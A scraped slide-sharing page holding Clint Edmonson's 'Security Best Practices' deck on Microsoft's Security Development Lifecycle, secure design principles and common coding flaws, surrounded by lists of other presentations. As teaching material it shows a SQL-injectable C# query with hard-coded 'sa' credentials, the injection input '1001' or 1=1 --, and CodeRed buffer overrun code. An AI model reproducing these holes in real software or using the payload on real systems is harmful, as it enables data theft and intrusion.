Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
iotcloudserve_tein
 
656704621-Against-Threats-and-Secure-Cloud-Environments-Presentation-Slides-F...
656704621-Against-Threats-and-Secure-Cloud-Environments-Presentation-Slides-F...656704621-Against-Threats-and-Secure-Cloud-Environments-Presentation-Slides-F...
656704621-Against-Threats-and-Secure-Cloud-Environments-Presentation-Slides-F...
mahadikamol123
 
Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & Architecture Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & Architecture
Priyanka Aash
 
SDL: Secure design principles
SDL: Secure design principlesSDL: Secure design principles
SDL: Secure design principles
sluge
 
An Introduction to Secure Application Development
An Introduction to Secure Application DevelopmentAn Introduction to Secure Application Development
An Introduction to Secure Application Development
Christopher Frenz
 
tas-s6-software-engineering-slide-deck-secure-software-architecture.pptx
tas-s6-software-engineering-slide-deck-secure-software-architecture.pptxtas-s6-software-engineering-slide-deck-secure-software-architecture.pptx
tas-s6-software-engineering-slide-deck-secure-software-architecture.pptx
Mostafa Taghizade
 
3.Secure Design Principles And Process
3.Secure Design Principles And Process3.Secure Design Principles And Process
3.Secure Design Principles And Process
phanleson
 
Break it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareBreak it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure software
Leigh Honeywell
 
[Warsaw 26.06.2018] SDL Threat Modeling principles
[Warsaw 26.06.2018] SDL Threat Modeling principles[Warsaw 26.06.2018] SDL Threat Modeling principles
[Warsaw 26.06.2018] SDL Threat Modeling principles
OWASP
 
Chapter 2- Software Security FULL SLIDES.ppt
Chapter 2- Software Security FULL SLIDES.pptChapter 2- Software Security FULL SLIDES.ppt
Chapter 2- Software Security FULL SLIDES.ppt
Lina Shimelis
 
Software Security Engineering
Software Security EngineeringSoftware Security Engineering
Software Security Engineering
Marco Morana
 
Software Security in the Real World
Software Security in the Real WorldSoftware Security in the Real World
Software Security in the Real World
Mark Curphey
 
Microsoft Security Development Lifecycle
Microsoft Security Development LifecycleMicrosoft Security Development Lifecycle
Microsoft Security Development Lifecycle
Razi Rais
 
Using Third Party Components for Building an Application Might be More Danger...
Using Third Party Components for Building an Application Might be More Danger...Using Third Party Components for Building an Application Might be More Danger...
Using Third Party Components for Building an Application Might be More Danger...
Achim D. Brucker
 
AMI Security 101 - Smart Grid Security East 2011
AMI Security 101 - Smart Grid Security East 2011AMI Security 101 - Smart Grid Security East 2011
AMI Security 101 - Smart Grid Security East 2011
dma1965
 
Appsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martinAppsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martin
drewz lin
 
Introduction to Application Security Testing
Introduction to Application Security TestingIntroduction to Application Security Testing
Introduction to Application Security Testing
Mohamed Ridha CHEBBI, CISSP
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
DefCamp
 
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsSecurity in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
Cenzic
 
Fendley how secure is your e learning
Fendley how secure is your e learningFendley how secure is your e learning
Fendley how secure is your e learning
Bryan Fendley
 
Ad

More from Clint Edmonson (20)

New Product Concept Design.pptx
New Product Concept Design.pptxNew Product Concept Design.pptx
New Product Concept Design.pptx
Clint Edmonson
 
Lean & Agile Essentials
Lean & Agile EssentialsLean & Agile Essentials
Lean & Agile Essentials
Clint Edmonson
 
MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?
MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?
MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?
Clint Edmonson
 
Flow, the Universe and Everything
Flow, the Universe and EverythingFlow, the Universe and Everything
Flow, the Universe and Everything
Clint Edmonson
 
Application architecture jumpstart
Application architecture jumpstartApplication architecture jumpstart
Application architecture jumpstart
Clint Edmonson
 
Code smells and Other Malodorous Software Odors
Code smells and Other Malodorous Software OdorsCode smells and Other Malodorous Software Odors
Code smells and Other Malodorous Software Odors
Clint Edmonson
 
State of agile 2016
State of agile 2016State of agile 2016
State of agile 2016
Clint Edmonson
 
Lean & Agile DevOps with VSTS and TFS 2015
Lean & Agile DevOps with VSTS and TFS 2015Lean & Agile DevOps with VSTS and TFS 2015
Lean & Agile DevOps with VSTS and TFS 2015
Clint Edmonson
 
Application Architecture Jumpstart
Application Architecture JumpstartApplication Architecture Jumpstart
Application Architecture Jumpstart
Clint Edmonson
 
Agile Metrics That Matter
Agile Metrics That MatterAgile Metrics That Matter
Agile Metrics That Matter
Clint Edmonson
 
Advanced oop laws, principles, idioms
Advanced oop laws, principles, idiomsAdvanced oop laws, principles, idioms
Advanced oop laws, principles, idioms
Clint Edmonson
 
Application architecture jumpstart
Application architecture jumpstartApplication architecture jumpstart
Application architecture jumpstart
Clint Edmonson
 
ADO.NET Entity Framework
ADO.NET Entity FrameworkADO.NET Entity Framework
ADO.NET Entity Framework
Clint Edmonson
 
Windows 8 - The JavaScript Story
Windows 8 - The JavaScript StoryWindows 8 - The JavaScript Story
Windows 8 - The JavaScript Story
Clint Edmonson
 
Windows Azure Jumpstart
Windows Azure JumpstartWindows Azure Jumpstart
Windows Azure Jumpstart
Clint Edmonson
 
Introduction to Windows Azure Virtual Machines
Introduction to Windows Azure Virtual MachinesIntroduction to Windows Azure Virtual Machines
Introduction to Windows Azure Virtual Machines
Clint Edmonson
 
Peering through the Clouds - Cloud Architectures You Need to Master
Peering through the Clouds - Cloud Architectures You Need to MasterPeering through the Clouds - Cloud Architectures You Need to Master
Peering through the Clouds - Cloud Architectures You Need to Master
Clint Edmonson
 
Architecting Scalable Applications in the Cloud
Architecting Scalable Applications in the CloudArchitecting Scalable Applications in the Cloud
Architecting Scalable Applications in the Cloud
Clint Edmonson
 
Windows Azure jumpstart
Windows Azure jumpstartWindows Azure jumpstart
Windows Azure jumpstart
Clint Edmonson
 
Windows Azure Virtual Machines
Windows Azure Virtual MachinesWindows Azure Virtual Machines
Windows Azure Virtual Machines
Clint Edmonson
 
New Product Concept Design.pptx
New Product Concept Design.pptxNew Product Concept Design.pptx
New Product Concept Design.pptx
Clint Edmonson
 
Lean & Agile Essentials
Lean & Agile EssentialsLean & Agile Essentials
Lean & Agile Essentials
Clint Edmonson
 
MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?
MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?
MICROSOFT BLAZOR - NEXT GENERATION WEB UI OR SILVERLIGHT ALL OVER AGAIN?
Clint Edmonson
 
Flow, the Universe and Everything
Flow, the Universe and EverythingFlow, the Universe and Everything
Flow, the Universe and Everything
Clint Edmonson
 
Application architecture jumpstart
Application architecture jumpstartApplication architecture jumpstart
Application architecture jumpstart
Clint Edmonson
 
Code smells and Other Malodorous Software Odors
Code smells and Other Malodorous Software OdorsCode smells and Other Malodorous Software Odors
Code smells and Other Malodorous Software Odors
Clint Edmonson
 
State of agile 2016
State of agile 2016State of agile 2016
State of agile 2016
Clint Edmonson
 
Lean & Agile DevOps with VSTS and TFS 2015
Lean & Agile DevOps with VSTS and TFS 2015Lean & Agile DevOps with VSTS and TFS 2015
Lean & Agile DevOps with VSTS and TFS 2015
Clint Edmonson
 
Application Architecture Jumpstart
Application Architecture JumpstartApplication Architecture Jumpstart
Application Architecture Jumpstart
Clint Edmonson
 
Agile Metrics That Matter
Agile Metrics That MatterAgile Metrics That Matter
Agile Metrics That Matter
Clint Edmonson
 
Advanced oop laws, principles, idioms
Advanced oop laws, principles, idiomsAdvanced oop laws, principles, idioms
Advanced oop laws, principles, idioms
Clint Edmonson
 
Application architecture jumpstart
Application architecture jumpstartApplication architecture jumpstart
Application architecture jumpstart
Clint Edmonson
 
ADO.NET Entity Framework
ADO.NET Entity FrameworkADO.NET Entity Framework
ADO.NET Entity Framework
Clint Edmonson
 
Windows 8 - The JavaScript Story
Windows 8 - The JavaScript StoryWindows 8 - The JavaScript Story
Windows 8 - The JavaScript Story
Clint Edmonson
 
Windows Azure Jumpstart
Windows Azure JumpstartWindows Azure Jumpstart
Windows Azure Jumpstart
Clint Edmonson
 
Introduction to Windows Azure Virtual Machines
Introduction to Windows Azure Virtual MachinesIntroduction to Windows Azure Virtual Machines
Introduction to Windows Azure Virtual Machines
Clint Edmonson
 
Peering through the Clouds - Cloud Architectures You Need to Master
Peering through the Clouds - Cloud Architectures You Need to MasterPeering through the Clouds - Cloud Architectures You Need to Master
Peering through the Clouds - Cloud Architectures You Need to Master
Clint Edmonson
 
Architecting Scalable Applications in the Cloud
Architecting Scalable Applications in the CloudArchitecting Scalable Applications in the Cloud
Architecting Scalable Applications in the Cloud
Clint Edmonson
 
Windows Azure jumpstart
Windows Azure jumpstartWindows Azure jumpstart
Windows Azure jumpstart
Clint Edmonson
 
Windows Azure Virtual Machines
Windows Azure Virtual MachinesWindows Azure Virtual Machines
Windows Azure Virtual Machines
Clint Edmonson
 

Recently uploaded (20)

The Peter Cowley Entrepreneurship Event Master 30th.pdf
The Peter Cowley Entrepreneurship Event Master 30th.pdfThe Peter Cowley Entrepreneurship Event Master 30th.pdf
The Peter Cowley Entrepreneurship Event Master 30th.pdf
Richard Lucas
 
Top 5 Mistakes to Avoid When Writing a Job Application
Top 5 Mistakes to Avoid When Writing a Job ApplicationTop 5 Mistakes to Avoid When Writing a Job Application
Top 5 Mistakes to Avoid When Writing a Job Application
Red Tape Busters
 
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
TheoRuby
 
Salesforce_Architecture_Diagramming_Workshop (1).pptx
Salesforce_Architecture_Diagramming_Workshop (1).pptxSalesforce_Architecture_Diagramming_Workshop (1).pptx
Salesforce_Architecture_Diagramming_Workshop (1).pptx
reinbauwens1
 
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdfNewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
Khaled Al Awadi
 
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
Khaled Al Awadi
 
Smart Home Market Size, Growth and Report (2025-2034)
Smart Home Market Size, Growth and Report (2025-2034)Smart Home Market Size, Growth and Report (2025-2034)
Smart Home Market Size, Growth and Report (2025-2034)
GeorgeButtler
 
Kiran Flemish - A Dynamic Musician
Kiran Flemish - A Dynamic MusicianKiran Flemish - A Dynamic Musician
Kiran Flemish - A Dynamic Musician
Kiran Flemish
 
BeMetals_Presentation_May_2025 .pdf
BeMetals_Presentation_May_2025 .pdfBeMetals_Presentation_May_2025 .pdf
BeMetals_Presentation_May_2025 .pdf
DerekIwanaka2
 
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Lviv Startup Club
 
Petslify Turns Pet Photos into Hug-Worthy Memories
Petslify Turns Pet Photos into Hug-Worthy MemoriesPetslify Turns Pet Photos into Hug-Worthy Memories
Petslify Turns Pet Photos into Hug-Worthy Memories
Petslify
 
waterBeta white paper - 250202- two-column.docx
waterBeta white paper - 250202- two-column.docxwaterBeta white paper - 250202- two-column.docx
waterBeta white paper - 250202- two-column.docx
Peter Adriaens
 
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
ThiNgc22
 
Alan Stalcup - The Enterprising CEO
Alan Stalcup - The Enterprising CEOAlan Stalcup - The Enterprising CEO
Alan Stalcup - The Enterprising CEO
Alan Stalcup
 
The Fascinating World of Hats: A Brief History of Hats
The Fascinating World of Hats: A Brief History of HatsThe Fascinating World of Hats: A Brief History of Hats
The Fascinating World of Hats: A Brief History of Hats
nimrabilal030
 
Looking for Reliable BPO Project Providers?"
Looking for Reliable BPO Project Providers?"Looking for Reliable BPO Project Providers?"
Looking for Reliable BPO Project Providers?"
anujascentbpo
 
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdfAccounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
CA Suvidha Chaplot
 
Harnessing Hyper-Localisation: A New Era in Retail Strategy
Harnessing Hyper-Localisation: A New Era in Retail StrategyHarnessing Hyper-Localisation: A New Era in Retail Strategy
Harnessing Hyper-Localisation: A New Era in Retail Strategy
RUPAL AGARWAL
 
intra-mart Accel series 2025 Spring updates-en.ppt
intra-mart Accel series 2025 Spring updates-en.pptintra-mart Accel series 2025 Spring updates-en.ppt
intra-mart Accel series 2025 Spring updates-en.ppt
NTTDATA INTRAMART
 
Brandon Flatley - A Skilled Musician
Brandon Flatley - A Skilled MusicianBrandon Flatley - A Skilled Musician
Brandon Flatley - A Skilled Musician
Brandon Flatley
 
The Peter Cowley Entrepreneurship Event Master 30th.pdf
The Peter Cowley Entrepreneurship Event Master 30th.pdfThe Peter Cowley Entrepreneurship Event Master 30th.pdf
The Peter Cowley Entrepreneurship Event Master 30th.pdf
Richard Lucas
 
Top 5 Mistakes to Avoid When Writing a Job Application
Top 5 Mistakes to Avoid When Writing a Job ApplicationTop 5 Mistakes to Avoid When Writing a Job Application
Top 5 Mistakes to Avoid When Writing a Job Application
Red Tape Busters
 
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
Web Design Creating User-Friendly and Visually Engaging Websites - April 2025...
TheoRuby
 
Salesforce_Architecture_Diagramming_Workshop (1).pptx
Salesforce_Architecture_Diagramming_Workshop (1).pptxSalesforce_Architecture_Diagramming_Workshop (1).pptx
Salesforce_Architecture_Diagramming_Workshop (1).pptx
reinbauwens1
 
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdfNewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
NewBase 05 May 2025 Energy News issue - 1785 by Khaled Al Awadi_compressed.pdf
Khaled Al Awadi
 
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
NewBase 28 April 2025 Energy News issue - 1783 by Khaled Al Awadi_compressed...
Khaled Al Awadi
 
Smart Home Market Size, Growth and Report (2025-2034)
Smart Home Market Size, Growth and Report (2025-2034)Smart Home Market Size, Growth and Report (2025-2034)
Smart Home Market Size, Growth and Report (2025-2034)
GeorgeButtler
 
Kiran Flemish - A Dynamic Musician
Kiran Flemish - A Dynamic MusicianKiran Flemish - A Dynamic Musician
Kiran Flemish - A Dynamic Musician
Kiran Flemish
 
BeMetals_Presentation_May_2025 .pdf
BeMetals_Presentation_May_2025 .pdfBeMetals_Presentation_May_2025 .pdf
BeMetals_Presentation_May_2025 .pdf
DerekIwanaka2
 
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Yuriy Chapran: Zero Trust and Beyond: OpenVPN’s Role in Next-Gen Network Secu...
Lviv Startup Club
 
Petslify Turns Pet Photos into Hug-Worthy Memories
Petslify Turns Pet Photos into Hug-Worthy MemoriesPetslify Turns Pet Photos into Hug-Worthy Memories
Petslify Turns Pet Photos into Hug-Worthy Memories
Petslify
 
waterBeta white paper - 250202- two-column.docx
waterBeta white paper - 250202- two-column.docxwaterBeta white paper - 250202- two-column.docx
waterBeta white paper - 250202- two-column.docx
Peter Adriaens
 
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
2_English_Vocabulary_In_Use_Pre-Intermediate_Cambridge_-_Fourth_Edition (1).pdf
ThiNgc22
 
Alan Stalcup - The Enterprising CEO
Alan Stalcup - The Enterprising CEOAlan Stalcup - The Enterprising CEO
Alan Stalcup - The Enterprising CEO
Alan Stalcup
 
The Fascinating World of Hats: A Brief History of Hats
The Fascinating World of Hats: A Brief History of HatsThe Fascinating World of Hats: A Brief History of Hats
The Fascinating World of Hats: A Brief History of Hats
nimrabilal030
 
Looking for Reliable BPO Project Providers?"
Looking for Reliable BPO Project Providers?"Looking for Reliable BPO Project Providers?"
Looking for Reliable BPO Project Providers?"
anujascentbpo
 
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdfAccounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
Accounting_Basics_Complete_Guide_By_CA_Suvidha_Chaplot (1).pdf
CA Suvidha Chaplot
 
Harnessing Hyper-Localisation: A New Era in Retail Strategy
Harnessing Hyper-Localisation: A New Era in Retail StrategyHarnessing Hyper-Localisation: A New Era in Retail Strategy
Harnessing Hyper-Localisation: A New Era in Retail Strategy
RUPAL AGARWAL
 
intra-mart Accel series 2025 Spring updates-en.ppt
intra-mart Accel series 2025 Spring updates-en.pptintra-mart Accel series 2025 Spring updates-en.ppt
intra-mart Accel series 2025 Spring updates-en.ppt
NTTDATA INTRAMART
 
Brandon Flatley - A Skilled Musician
Brandon Flatley - A Skilled MusicianBrandon Flatley - A Skilled Musician
Brandon Flatley - A Skilled Musician
Brandon Flatley
 

Security Best Practices

  • 1. Security Best PracticesClint EdmonsonArchitect EvangelistMicrosoft [email protected]
  • 6. AgendaMicrosoft Security Development LifecycleSecure Design PrinciplesClint’s Dirty Dozen
  • 7. Microsoft Security Development Lifecycle (SDL)Executive commitment SDL a mandatory policy at Microsoft since 2004EducationAccountabilityTechnology and ProcessOngoing Process Improvements  6 month cycle
  • 8. Security auditSecurity pushSDL Product Development TimelineSecurity sign-offcriteria determinedThreatanalysisSecure questionsduring interviewsLearn & RefineExternal reviewConceptDesignsCompleteTest plansCompleteCodeCompleteShipPostShipTeam membertrainingReview old defects Check-ins checkedSecure coding guidelinesUse toolsData mutation& Least PrivTestsSWIReview
  • 11. SDL Secure Design PrinciplesCore SDL secure design principles:Attack Surface ReductionBasic PrivacyThreat ModelingDefense in DepthLeast PrivilegeSecure Defaults
  • 12. SDL Core Principle: Attack Surface ReductionAttack Surface:Any part of an application that is accessible by a human or another programEach one of these can be potentially exploited by a malicious userAttack Surface Reduction:Minimize the number of exposed attack surface points a malicious user can discover and attempt to exploit
  • 14. Attack Surface AnalysisNetwork inputs/outputsFile inputs/ outputsEtc.Authenticated or non-authenticated
  • 18. Etc.Attack Surface Analysis TipsIterative process, for all features you need to also analyze their sub-features Restrict access to features as much as possible
  • 19. It’s Not Just About Turning Things Off
  • 21. SDL Core Principle: Basic PrivacySecurity versus PrivacySecurity: Establishing protective measures that defend against hostile acts or influences and protects the confidentiality of personal informationPrivacy: Empowering users to control the use, collection and distribution of their personal informationSecurity AND Privacy together are key factors to trustworthy computing
  • 22. Important Note: Security Does Not Always Guarantee PrivacyIt is possible to have a secure system that does not preserve users’ privacy.Authentication vs. AuthorizationVerify who areVerify what they can access
  • 24. Microsoft Privacy Guidelines for Developing Products and ServicesDocumented requirements and recommendations for privacy-compliant products and servicesAvailable online for downloadMicrosoft customers will be empowered to control the collection, use, and distribution of their personal information
  • 25. SDL Core Principle: Threat ModelingThreat Modeling: A process to understand threats to an applicationThreats and vulnerabilitiesThreats: Actions a malicious user may attempt in order to compromise a systemVulnerabilities: A specific way a threat is exploitable, such as a coding error
  • 26. Threat Modeling In a NutshellProductDevelopment
  • 27. Microsoft Threat Modeling ToolMicrosoft has published the threat modeling tool and it uses internally to assess threats against products and servicesFreely available online for download
  • 28. SDL Core Principle: Defense In DepthDefense in Depth: If one defense layer is breached, what other defense layers (if any) provide additional protection to the application?Assume that software and/or hardware will fail at some pointMost applications today can be compromised when a single, and often only, layer of defense is breached (firewall)
  • 31. SDL Core Principle: Least PrivilegeAssume that all applications can and will be compromisedLeast Privilege: If an application is compromised, then the potential damage that the malicious person can inflict is contained and minimized accordingly
  • 32. Least Privilege ExampleLOCAL SYSTEMNON-ADMINADMIN / SYSTEM LEVEL Read user files
  • 33. Change system passwords
  • 36. Change system passwords
  • 38. Limited capabilitiesLeast Privilege TipsEvaluate your application and think minimally!What is the minimum access level your application requires to perform its functions?Elevate privileges only when needed, and then release those elevated privileges when their purposes have been satisfied
  • 39. SDL Core Principle: Secure DefaultsSecure Defaults: Deploy applications in more secure configurations by default.Helps to better ensure that customers get safer experience with your application out of the box, not after extensive configurationIt is up to the user to reduce security and privacy levels
  • 41. Clint’s Dirty DozenClient-side enforcement of server-side securityImproper input validationClear transmission of sensitive informationFailure to preserve SQL query integrityCross-site request forgery (HTML output integrity)Error message information leak
  • 42. Clint’s Dirty Dozen File or path name leakingCritical state data exposureImproper access control (authorization)Use of broken or risky cryptography algorithmsHard-coded passwordsExecution with unnecessary privilegesFailure to constrain operations within memory buffers (buffer overrun)(a concern in unmanaged languages)
  • 43. ConclusionSafer applications begin with secure planning and designSDL Core principles:Attack Surface ReductionBasic PrivacyThreat ModelingDefense in DepthLeast PrivilegeSecure Defaults
  • 46. Microsoft Security Development Lifecycle (SDL)SDL Book:http://www.microsoft.com/mspress/books/8753.aspxOfficial SDL Web Site: http://www.microsoft.com/sdl
  • 47. Threat Modeling ResourcesThreat Modeling Book:http://www.microsoft.com/mspress/books/6892.aspxThreat Modeling Tool:http://www.microsoft.com/downloads/details.aspx?FamilyID=62830f95-0e61-4f87-88a6-e7c663444ac1&displaylang=en
  • 48. Microsoft Developer Network (MSDN) Security Developer CenterOfficial Web site: http://msdn.microsoft.com/security
  • 49. Secure Development BlogsThe Microsoft Security Development Lifecycle (SDL) Blog: http://blogs.msdn.com/sdlMichael Howard’s Blog: http://blogs.msdn.com/michael_howardJ.D. Meier’s Security Hotspots: http://shapingsoftware.com/2009/03/09/security-hot-spotsSANS Institute Top 25 Most Dangerous Programming Errors: http://www.sans.org/top25errors
  • 50. Clint EdmonsonArchitect EvangelistMicrosoft [email protected] available at:http://www.notsotrivial.net/slides
  • 51. © 2002 Microsoft Corporation. All rights reserved.This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
  • 53. Secure Design TenetsReduce Attack SurfaceDefense in DepthLeast PrivilegeSecure Defaults Learn from Past MistakesSecurity is a FeatureProvide Application Diversity
  • 54. Reducing Attack SurfaceLess code running by default = less stuff to whack by defaultSlammer/CodeRed would not have happened if the features were not on by defaultILoveYou (etc.) would not have happened if scripting was offRequires less admin skillReduces the urgency to deploy security fixesUsability often means “automatically”
  • 55. Input Trust Issues“All input is evil, until proven otherwise!”The root of most vulnerabilitiesBuffer OverrunsCanonicalization issuesCross-site Scripting (XSS) attacksSQL Injection attacks Good guys give you well-formed data, bad guys don’t!Don’t rely on your client application providing clean dataDon’t assume attackers play by the rulesThey go ‘under the radar’
  • 56. Buffer OverrunsBeen around foreverPrimarily a C/C++ issueProgramming close to the metal!Prime example of Sloppy Programming!Aim is to change the flow of execution so attacker’s code is calledLack of diversity helps the attackerChapter 5
  • 57. Buffer Overruns at WorkBuffersOther varsArgsEBPEIPHigher addressesvoid foo(char *p, int i) { int j = 0; CFoo foo; int (*fp)(int) = &func; char b[16];}
  • 58. Buffer Overruns at WorkBuffersOther varsArgsEBPEIPFunction return addressHigher addresses0wn3d!Exception handlersFunction pointersVirtual methodsAll determineexecution flow
  • 59. Buffer Overrun ResultsIf you’re lucky, you get an AVDenial of Service against serversIf you’re unlucky, you get instabilityBest of luck debugging that one!If you’re really unlucky, the attacker injects code into your processAnd executes it
  • 60. Buffer Overrun ExamplesIndex Server ISAPI Application (CodeRed)// cchAttribute is char count of user inputWCHAR wcsAttribute[200];if ( cchAttribute >= sizeof wcsAttribute) THROW( CException( DB_E_ERRORSINCOMMAND ) );DecodeURLEscapes( (BYTE *) pszAttribute, cchAttribute, wcsAttribute,webServer.CodePage()); ...void DecodeURLEscapes( BYTE * pIn, ULONG & l, WCHAR * pOut, ULONG ulCodePage ) { WCHAR * p2 = pOut; ULONG l2 = l; ... for( ; l2; l2-- ) {// write to p2 based on pIn, up to l2 bytes
  • 61. Buffer Overrun ExamplesIndex Server ISAPI Application (CodeRed)// cchAttribute is char count of user inputWCHAR wcsAttribute[200];if ( cchAttribute >= sizeof wcsAttribute / sizeof WCHAR) THROW( CException( DB_E_ERRORSINCOMMAND ) );DecodeURLEscapes( (BYTE *) pszAttribute, cchAttribute, wcsAttribute,webServer.CodePage()); ...void DecodeURLEscapes( BYTE * pIn, ULONG & l, WCHAR * pOut, ULONG ulCodePage ) { WCHAR * p2 = pOut; ULONG l2 = l; ... for( ; l2; l2-- ) {// write to p2 based on pIn, up to l2 bytesFIXED!
  • 62. Using strncpyNaïve use of strncpy is no fixMay not null-terminate the stringShell version, StrCpyN and Windows lstrcpy do, howeverPerformance issuesThird argsizeof mix-upsOff-by-one errorsTotal size of destination bufferConsider strsafe.h/ntstrsafe.hIn Platform SDK, MSDN and VS.NET 2003
  • 63. The VC++ /GS FlagA VC++.NET compile-time option that adds run-time code to certain functionsUnmanaged C/C++A random value called a ‘cookie’ inserted into stackValidates various stack data is not corruptMost of Windows Server 2003 and VS.NET is compiled with this optionWindowsXP SP2 Minimal perf hit – 4 instructions!
  • 64. What /GS is NOTA PanaceaA cure for lazy developers!Crap code + /GS == crap code!Only catches some stack-smashing attacksNo heap protectionIt’s an insurance policy
  • 65. Fixing Buffer OverrunsTrace data coming in from the ‘outside’Watch for data as it moves from untrusted to trusted boundariesBuild approp test plans using data mutationBe wary of certain functionsstrcpy, CopyMemory, MultiByteToWideCharsprintf(…,”%s”,…)Refer to Writing Secure Code 2nd Edition for listAPI which use byte vs. char countsNo such thing as ‘bad functions’ only ‘bad developers’Not limited to copy functionsCompile with /GSWindows Server 2003 on AMD Opteron™ adds /noexecute boot option
  • 66. Canonicalization IssuesNever make a decision based on the name of a fileChances are good that you’ll get it wrongOften, there is more than one way to name something
  • 69. İ// Do not allow "FILE://" URLsif(url.ToUpper().Left(4) == "FILE") return ERROR;getStuff(url);// Only allow "HTTP://" URLsif(url.ToUpper(CULTURE_INVARIANT).Left(4) == "HTTP") getStuff(url);else return ERROR; The Turkish-I problem(Applies also to Azerbaijan!)Turkish has four letter ‘I’si (U+0069) ı (U+0131) İ (U+0130) I (U+0049)In Turkish locale UC("file")==FİLE
  • 70. SQL Injection – C#string Status = "No";string sqlstring ="";try { SqlConnection sql= new SqlConnection( @"data source=localhost;" + "user id=sa;password=password;"); sql.Open(); sqlstring="SELECT HasShipped" + " FROM detail WHERE ID='" + Id + "'"; SqlCommand cmd = new SqlCommand(sqlstring,sql); if ((int)cmd.ExecuteScalar() != 0) Status = "Yes";} catch (SqlException se) { Status = sqlstring + " failed\n\r"; foreach (SqlError e in se.Errors) {Status += e.Message + "\n\r";}} catch (Exception e) { Status = e.ToString();}
  • 71. Good GuyID: 1001SELECT HasShippedFROM detail WHERE ID='1001'Not so Good GuyID: 1001' or 1=1 --SELECT HasShippedFROM detail WHERE ID= '1001' or 1=1 -- 'Why It’s Wrong(1 of 2)
